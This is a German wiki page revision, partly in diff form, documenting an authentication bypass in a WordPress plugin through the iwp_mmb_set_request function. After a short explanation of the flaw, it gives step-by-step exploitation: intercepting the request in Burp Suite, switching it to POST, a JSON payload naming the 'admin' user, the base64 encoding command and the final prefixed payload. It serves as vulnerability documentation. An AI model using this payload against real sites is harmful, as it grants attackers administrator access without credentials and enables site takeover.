Version vom 7. November 2022, 06:24 Uhr

CVE

Aufgrund logischer Fehler im Code ist es möglich, sich als beliebiger Administrator auf der Website anzumelden.
Das Problem liegt in der Funktion iwp_mmb_set_request, die sich in der Datei init.php befindet.
Dies prüft, ob das Array request_params der Kernklasse nicht leer ist, was nur in einer anderen Funktion gesetzt wird
Da passiert nur wenn gefüllt wird und wenn die Nutzlast bestimmte Bedingungen erfüllt
(in diesem Szenario sind die Aktionen readd_site und add_site die einzigen Aktionen, die keine haben Autorisierungsprüfung, weshalb dieses Problem besteht.)
Sobald die Payload diese Bedingungen erfüllt, wird der angegebene Benutzername-Parameter verwendet
DerAnforderer wird als diesen Benutzer angemeldet, ohne eine weitere Authentifizierung durchzuführen.

Laden Sie die Zielwebsite neu und fangen Sie die Anfrage mit Burp Suite ab.
Klicken Sie mit der rechten Maustaste auf die Burp Suite und klicken Sie auf „Anfragemethode ändern“, um die Anfrage von GET in POST umzuwandeln.

Payload: {"iwp_action":"add_site","params":{"username":"admin"}}

echo '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64 -w0
Hängen Sie den base64 generierte Payload an die Zeichenfolge _IWP_JSON_PREFIX_ an.

Payload: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=

@@ Zeile 13: / Zeile 13: @@
 =Request=
 *Laden Sie die Zielwebsite neu und fangen Sie die Anfrage mit Burp Suite ab.
+*Klicken Sie mit der rechten Maustaste auf die Burp Suite und klicken Sie auf „Anfragemethode ändern“, um die Anfrage von GET in POST umzuwandeln.
 [[Datei:Authentication-Bypass-Wordpress.png|900px]]
@@ Zeile 22: / Zeile 25: @@
 *echo '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64 -w0
-*Append the base64 generated payload with the String mentioned in the exploit URL.
 *Hängen Sie den base64 generierte Payload an die Zeichenfolge _IWP_JSON_PREFIX_ an.